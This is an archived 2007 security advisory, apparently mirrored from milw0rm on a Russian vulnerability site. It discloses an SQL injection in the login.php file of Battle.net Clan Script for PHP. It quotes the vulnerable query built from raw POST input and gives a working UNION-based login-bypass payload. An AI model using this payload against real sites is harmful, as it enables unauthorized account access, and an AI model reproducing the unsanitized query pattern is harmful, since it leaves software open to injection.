Информационная безопасность
[RU] switch to English


Дополнительная информация

  Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl )

  CVE-2007-1871: Cross site scripting in chcounter 3.1.3

  E107 - (v0.7.8) Access Escalation Vulnerbility - PoC

  Critical phpwiki c99shell exploit

  CVE-2007-1872: Cross site scripting in toendaCMS 1.5.3

From:h a c k e r _ X <sims.hack_(at)_gmail.com>
Date:11 апреля 2007 г.
Subject:Battle.net Clan Script for PHP 1.5.1 Remote SQL Injection Vulnerability

****************************************

script : Battle.net Clan Script 1.5
file : login.php
attack : injection sql

auteur : h a c k e r _ X

***************************************

code :
---------------------------------------------------------------------------------
---------

line 9 --> $user = $_POST['user'];
line 10--> $pass = $_POST['pass'];

.....
.....
.....

line 21--> mysql_query("SELECT * FROM bcs_members WHERE name='$user' AND password='$pass'", $link);
*******

---------------------------------------------------------------------------------
----------------


exploit :
*******

Username : ' union select 0,0,0,0,0,0,0,0,0,0,0 from bcs_members/*
password : enything





************************************************** *
thinks to : max007,simo64,brutalism and all marocains hackers

special thinks for "P Y N S S O"

************************************************** *

# milw0rm.com [2007-04-09]

О сайте | Условия использования
© SecurityVulns, 3APA3A, Владимир Дубровин
Нижний Новгород